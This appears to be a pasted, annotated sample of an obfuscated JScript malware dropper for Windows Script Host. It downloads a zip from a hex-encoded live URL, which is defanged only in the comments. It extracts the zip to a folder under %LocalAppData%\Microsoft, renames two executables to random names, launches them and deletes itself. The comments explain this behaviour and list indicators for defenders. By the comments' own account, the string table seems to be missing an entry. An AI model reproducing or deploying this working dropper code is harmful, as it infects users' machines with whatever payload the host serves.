
Untitled

a guest
Jun 23rd, 2017
  /**
   * String table for the obfuscation layer: the rest of the script never
   * spells out a COM ProgID, method name or path, it indexes into this array.
   *
   * NOTE(review): as pasted the table has 44 entries (indices 0-43), but the
   * code reads up to _0x9471[44] and uses _0x9471[4] as the initial value of
   * string accumulators. The usages only line up if an empty string sits at
   * index 4 (between the alphabet and "random"); that entry was presumably
   * lost when the sample was pasted - confirm against the original file.
   *
   * @type {Array}
   */
  var _0x9471 = [
    // COM ProgID and property names read at start-up.
    "WScript.NetWork",
    "UserName",
    "UserDomain",
    // Alphabet for the random file-name generator.
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "random",
    "length",
    "floor",
    "substring",
    "0",
    "%",
    "Scripting.FileSystemObject",
    "WScript.Shell",
    // Staging directory parts: %LocalAppData%\Microsoft\<user name>.
    "%LocalAppData%",
    "\\Microsoft\\",
    // sed-style text, passed as-is to new RegExp() by the hex decoder.
    "s/[^0-9A-Z]//g",
    "replace",
    "toUpperCase",
    "charAt",
    // Hex-encoded ASCII strings; decoded values are listed for IoC extraction.
    "726F6D616E696E672E657865", // "romaning.exe"
    "6D6D7363696E672E657865", // "mmscing.exe"
    "2E657865", // ".exe"
    // hxxp://driving-instructor-newcastle[.]com/include/clip/medmaz[.]zip (defanged)
    "687474703A2F2F64726976696E672D696E7374727563746F722D6E6577636173746C652E636F6D2F696E636C7564652F636C69702F6D65646D617A2E7A6970",
    "\\",
    "2E7A6970", // ".zip"
    // HTTP download and binary write to disk.
    "MSXML2.XMLHTTP",
    "onreadystatechange",
    "readyState",
    "ADODB.Stream",
    "open",
    "type",
    "write",
    "position",
    "saveToFile",
    "close",
    // Archive extraction and process launch through the Windows shell.
    "Shell.Application",
    "getFile",
    "getFolder",
    "Count", '"', "1",
    "2",
    "GET",
    "send",
    // Path of the running script, read for the final self-delete.
    "ScriptFullName"
  ];
  // Lookup table from a two-character upper-case hex pair to its byte value
  // (0-255). DC() indexes it with each pair of characters it reads from a
  // hex-encoded string. The unquoted keys (10, 11, ... 99) are numeric
  // literals; JavaScript stores them under their decimal string form, so a
  // lookup with the string "10" still finds them.
  var uReEidesQi = {
    "00": 0,
    "01": 1,
    "02": 2,
    "03": 3,
    "04": 4,
    "05": 5,
    "06": 6,
    "07": 7,
    "08": 8,
    "09": 9,
    "0A": 10,
    "0B": 11,
    "0C": 12,
    "0D": 13,
    "0E": 14,
    "0F": 15,
    10: 16,
    11: 17,
    12: 18,
    13: 19,
    14: 20,
    15: 21,
    16: 22,
    17: 23,
    18: 24,
    19: 25,
    "1A": 26,
    "1B": 27,
    "1C": 28,
    "1D": 29,
    "1E": 30,
    "1F": 31,
    20: 32,
    21: 33,
    22: 34,
    23: 35,
    24: 36,
    25: 37,
    26: 38,
    27: 39,
    28: 40,
    29: 41,
    "2A": 42,
    "2B": 43,
    "2C": 44,
    "2D": 45,
    "2E": 46,
    "2F": 47,
    30: 48,
    31: 49,
    32: 50,
    33: 51,
    34: 52,
    35: 53,
    36: 54,
    37: 55,
    38: 56,
    39: 57,
    "3A": 58,
    "3B": 59,
    "3C": 60,
    "3D": 61,
    "3E": 62,
    "3F": 63,
    40: 64,
    41: 65,
    42: 66,
    43: 67,
    44: 68,
    45: 69,
    46: 70,
    47: 71,
    48: 72,
    49: 73,
    "4A": 74,
    "4B": 75,
    "4C": 76,
    "4D": 77,
    "4E": 78,
    "4F": 79,
    50: 80,
    51: 81,
    52: 82,
    53: 83,
    54: 84,
    55: 85,
    56: 86,
    57: 87,
    58: 88,
    59: 89,
    "5A": 90,
    "5B": 91,
    "5C": 92,
    "5D": 93,
    "5E": 94,
    "5F": 95,
    60: 96,
    61: 97,
    62: 98,
    63: 99,
    64: 100,
    65: 101,
    66: 102,
    67: 103,
    68: 104,
    69: 105,
    "6A": 106,
    "6B": 107,
    "6C": 108,
    "6D": 109,
    "6E": 110,
    "6F": 111,
    70: 112,
    71: 113,
    72: 114,
    73: 115,
    74: 116,
    75: 117,
    76: 118,
    77: 119,
    78: 120,
    79: 121,
    "7A": 122,
    "7B": 123,
    "7C": 124,
    "7D": 125,
    "7E": 126,
    "7F": 127,
    80: 128,
    81: 129,
    82: 130,
    83: 131,
    84: 132,
    85: 133,
    86: 134,
    87: 135,
    88: 136,
    89: 137,
    "8A": 138,
    "8B": 139,
    "8C": 140,
    "8D": 141,
    "8E": 142,
    "8F": 143,
    90: 144,
    91: 145,
    92: 146,
    93: 147,
    94: 148,
    95: 149,
    96: 150,
    97: 151,
    98: 152,
    99: 153,
    "9A": 154,
    "9B": 155,
    "9C": 156,
    "9D": 157,
    "9E": 158,
    "9F": 159,
    "A0": 160,
    "A1": 161,
    "A2": 162,
    "A3": 163,
    "A4": 164,
    "A5": 165,
    "A6": 166,
    "A7": 167,
    "A8": 168,
    "A9": 169,
    "AA": 170,
    "AB": 171,
    "AC": 172,
    "AD": 173,
    "AE": 174,
    "AF": 175,
    "B0": 176,
    "B1": 177,
    "B2": 178,
    "B3": 179,
    "B4": 180,
    "B5": 181,
    "B6": 182,
    "B7": 183,
    "B8": 184,
    "B9": 185,
    "BA": 186,
    "BB": 187,
    "BC": 188,
    "BD": 189,
    "BE": 190,
    "BF": 191,
    "C0": 192,
    "C1": 193,
    "C2": 194,
    "C3": 195,
    "C4": 196,
    "C5": 197,
    "C6": 198,
    "C7": 199,
    "C8": 200,
    "C9": 201,
    "CA": 202,
    "CB": 203,
    "CC": 204,
    "CD": 205,
    "CE": 206,
    "CF": 207,
    "D0": 208,
    "D1": 209,
    "D2": 210,
    "D3": 211,
    "D4": 212,
    "D5": 213,
    "D6": 214,
    "D7": 215,
    "D8": 216,
    "D9": 217,
    "DA": 218,
    "DB": 219,
    "DC": 220,
    "DD": 221,
    "DE": 222,
    "DF": 223,
    "E0": 224,
    "E1": 225,
    "E2": 226,
    "E3": 227,
    "E4": 228,
    "E5": 229,
    "E6": 230,
    "E7": 231,
    "E8": 232,
    "E9": 233,
    "EA": 234,
    "EB": 235,
    "EC": 236,
    "ED": 237,
    "EE": 238,
    "EF": 239,
    "F0": 240,
    "F1": 241,
    "F2": 242,
    "F3": 243,
    "F4": 244,
    "F5": 245,
    "F6": 246,
    "F7": 247,
    "F8": 248,
    "F9": 249,
    "FA": 250,
    "FB": 251,
    "FC": 252,
    "FD": 253,
    "FE": 254,
    "FF": 255
  };
  // Host fingerprinting through the Windows Script Host network object:
  // [0] is the "WScript.NetWork" ProgID, [1] "UserName", [2] "UserDomain".
  // strUserName later becomes the name of the staging folder; strDomain is
  // read here but not referenced again in the visible script.
  var objNet = new ActiveXObject(_0x9471[0]);
  var strUserName = objNet[_0x9471[1]];
  var strDomain = objNet[_0x9471[2]];
  /**
   * Returns a string of `opt_attributes` characters, each picked with
   * Math.random() from the alphabet held in the string table. The script uses
   * it to give the dropped files unpredictable names, which defeats detection
   * by fixed file name.
   *
   * NOTE(review): index meanings ([4] empty string, [5] "random", [6] "length",
   * [7] "floor", [8] "substring") are inferred from how they are used; the
   * pasted table appears to be missing one entry - confirm.
   *
   * @param {number} opt_attributes Number of characters to generate.
   * @return {?} The generated name fragment.
   */
  function RCARANDOMIZE(opt_attributes) {
    var collection = _0x9471[3];
    // Local accumulator that shadows the function's own name.
    var RCARANDOMIZE = _0x9471[4];
    // `i` is assigned without a declaration, so it is not a local variable.
    /** @type {number} */
    i = 0;
    for (; i < opt_attributes; i++) {
      // Math.floor(Math.random() * alphabet.length): index of one character.
      var resp = Math[_0x9471[7]](Math[_0x9471[5]]() * collection[_0x9471[6]]);
      RCARANDOMIZE += collection[_0x9471[8]](resp, resp + 1);
    }
    return RCARANDOMIZE;
  }
  /**
   * Converts a byte value into the matching character by building a "%XX"
   * escape sequence and passing it to unescape().
   *
   * NOTE(review): [6] is read as "length", [9] as "0" and [10] as "%", which
   * is what the usage implies; the pasted table appears to be missing one
   * entry - confirm.
   *
   * @param {(number|string)} code Byte value, as looked up in uReEidesQi.
   * @return {?} Result of unescape() on the "%XX" sequence.
   */
  function BDyuZeiZue(code) {
    code = code.toString(16);
    // Left-pad to two hex digits so the escape sequence is well-formed.
    if (code[_0x9471[6]] == 1) {
      code = _0x9471[9] + code;
    }
    code = _0x9471[10] + code;
    return unescape(code);
  }
  /**
   * Creates the folder `path` unless it already exists, using the COM object
   * named by table entry [11] (read as "Scripting.FileSystemObject" - the
   * pasted table appears to be missing one entry, confirm).
   *
   * @param {?} path Folder to create.
   * @return {undefined}
   */
  function RCACreateFolder(path) {
    var fso = new ActiveXObject(_0x9471[11]);
    if (fso.FolderExists(path) == false) {
      fso.CreateFolder(path);
    }
  }
  // Builds and creates the staging directory. With [12] read as
  // "WScript.Shell", [13] as "%LocalAppData%" and [14] as "\\Microsoft\\",
  // the path is %LocalAppData%\Microsoft\<current user name>, a location the
  // user can write to without elevation and that blends in with legitimate
  // Microsoft folders. A folder named after the account directly under
  // %LocalAppData%\Microsoft is a host artefact of this sample.
  // NOTE(review): index meanings are inferred from usage - confirm.
  var objWShell = new ActiveXObject(_0x9471[12]);
  var RCAAppData = objWShell.ExpandEnvironmentStrings(_0x9471[13]) + _0x9471[14] + strUserName;
  RCACreateFolder(RCAAppData);
  /**
   * Decodes a hex-encoded string from the string table: characters are
   * consumed two at a time, each pair is mapped to a byte value through
   * uReEidesQi and turned into a character by BDyuZeiZue().
   *
   * NOTE(review): index meanings ([4] empty string, [6] "length",
   * [15] "s/[^0-9A-Z]//g", [16] "replace", [17] "toUpperCase", [18] "charAt")
   * are inferred from usage; the pasted table appears to be missing one
   * entry - confirm.
   *
   * @param {Text} dataAndEvents Hex-encoded input.
   * @return {?} The decoded string.
   */
  function DC(dataAndEvents) {
    // Upper-cases the input so it matches the upper-case keys of uReEidesQi.
    // NOTE(review): the RegExp is built from the whole sed-style text rather
    // than from the character class alone, and replace() gets no replacement
    // argument, so on plain hex input this call looks like a no-op - confirm.
    dataAndEvents = dataAndEvents[_0x9471[17]]()[_0x9471[16]](new RegExp(_0x9471[15]));
    // Local accumulator that shadows the function's own name.
    var DC = _0x9471[4];
    // Buffer for the hex pair currently being assembled.
    var unlock = _0x9471[4];
    /** @type {number} */
    var r20 = 0;
    for (; r20 < dataAndEvents[_0x9471[6]]; r20++) {
      unlock += dataAndEvents[_0x9471[18]](r20);
      // A complete pair: decode it, append the character, reset the buffer.
      if (unlock[_0x9471[6]] == 2) {
        DC += BDyuZeiZue(uReEidesQi[unlock]);
        unlock = _0x9471[4];
      }
    }
    return DC;
  }
  // Decodes the payload names and starts the download. Index meanings are
  // inferred from usage (the pasted table appears to be missing one entry -
  // confirm); the decoded values follow from the hex strings in the table.
  //   RCAFILE1 / RCAFILE2: "romaning.exe" / "mmscing.exe", the two file names
  //   the script expects to find after unpacking the archive.
  var RCAFILE1 = DC(_0x9471[19]);
  var RCAFILE2 = DC(_0x9471[20]);
  // Names the two executables are renamed to: 8 random characters + ".exe".
  var RCARANDOMIZEFILE1 = RCARANDOMIZE(8) + DC(_0x9471[21]);
  var RCARANDOMIZEFILE2 = RCARANDOMIZE(8) + DC(_0x9471[21]);
  // Arguments: decoded download URL
  // (hxxp://driving-instructor-newcastle[.]com/include/clip/medmaz[.]zip,
  // defanged), local archive path <staging dir>\<8 random chars>.zip, and the
  // staging directory. RCALNK is a function declaration, so the call works
  // even though the definition appears later in the file.
  RCALNK(DC(_0x9471[22]), RCAAppData + _0x9471[23] + RCARANDOMIZE(8) + DC(_0x9471[24]), RCAAppData);
  /**
   * Download, unpack and launch stage. Fetches `opt_obj2` over HTTP, writes
   * the response to `path`, copies the archive's items into
   * `deepDataAndEvents`, deletes the archive, renames the two expected
   * executables to the random names chosen at top level and starts both.
   *
   * Observable behaviour for defenders: the script host issuing an HTTP GET,
   * a .zip written to and then removed from the staging directory, and two
   * randomly named .exe files launched from that directory through
   * Shell.Application.
   *
   * NOTE(review): index meanings ([4] empty string, [11]
   * "Scripting.FileSystemObject", [23] "\\", [25] "MSXML2.XMLHTTP", [26]
   * "onreadystatechange", [27] "readyState", [28] "ADODB.Stream", [29] "open",
   * [30] "type", [31] "write", [32] "position", [33] "saveToFile", [34]
   * "close", [35] "Shell.Application", [36] "getFile", [37] "getFolder", [38]
   * "Count", [39] a double quote, [40] "1", [41] "2", [42] "GET", [43] "send")
   * are inferred from usage; the pasted table appears to be missing one
   * entry - confirm.
   *
   * @param {?} opt_obj2 URL to download.
   * @param {?} path Local path the downloaded archive is saved to.
   * @param {?} deepDataAndEvents Directory the archive is unpacked into.
   * @return {undefined}
   */
  function RCALNK(opt_obj2, path, deepDataAndEvents) {
    var xhr = new ActiveXObject(_0x9471[25]);
    /**
     * Runs once the request has completed (readyState 4).
     * @return {undefined}
     */
    xhr[_0x9471[26]] = function() {
      if (xhr[_0x9471[27]] === 4) {
        // Write the raw response body to disk through a binary stream:
        // type 1 is binary mode, saveToFile option 2 overwrites an existing file.
        var pair = new ActiveXObject(_0x9471[28]);
        pair[_0x9471[29]]();
        /** @type {number} */
        pair[_0x9471[30]] = 1;
        pair[_0x9471[31]](xhr.ResponseBody);
        /** @type {number} */
        pair[_0x9471[32]] = 0;
        pair[_0x9471[33]](path, 2);
        pair[_0x9471[34]]();
        // Unpack by opening the saved file as a shell namespace and copying
        // each item into the target folder; no unzip tool is involved.
        var fs = new ActiveXObject(_0x9471[11]);
        var fo = new ActiveXObject(_0x9471[35]);
        var resp = fo.NameSpace(fs[_0x9471[36]](path).Path);
        var row = fo.NameSpace(fs[_0x9471[37]](deepDataAndEvents).Path);
        /** @type {number} */
        var i = 0;
        for (; i < resp.Items()[_0x9471[38]]; i++) {
          // Flags 4 + 16: no progress dialog, answer "Yes to All" to prompts.
          row.CopyHere(resp.Items().Item(i), 4 + 16);
        }
        // Remove the archive once its contents have been copied out.
        fs.DeleteFile(path);
        // Rename each expected executable to its random name, then launch it
        // with the path wrapped in double quotes and the "open" verb. The last
        // ShellExecute argument is the window style ("1", then "2").
        fs.MoveFile(deepDataAndEvents + _0x9471[23] + RCAFILE1, deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE1);
        fo.ShellExecute(_0x9471[39] + deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE1 + _0x9471[39], _0x9471[4], _0x9471[4], _0x9471[29], _0x9471[40]);
        fs.MoveFile(deepDataAndEvents + _0x9471[23] + RCAFILE2, deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE2);
        fo.ShellExecute(_0x9471[39] + deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE2 + _0x9471[39], _0x9471[4], _0x9471[4], _0x9471[29], _0x9471[41]);
      }
    };
    // Third argument false: the request is synchronous.
    xhr[_0x9471[29]](_0x9471[42], opt_obj2, false);
    xhr[_0x9471[43]]();
  }
  // Self-delete: reads the running script's own path from WScript (entry [44],
  // read as "ScriptFullName") and removes that file, so the initial .js is no
  // longer on disk after execution. Forensic recovery of the script then
  // depends on other sources such as the mail attachment, download cache or
  // file-system journal.
  // NOTE(review): index meanings are inferred from usage; the pasted table
  // appears to be missing one entry - confirm.
  var teste = WScript[_0x9471[44]];
  var fso = new ActiveXObject(_0x9471[11]);
  fso.DeleteFile(teste);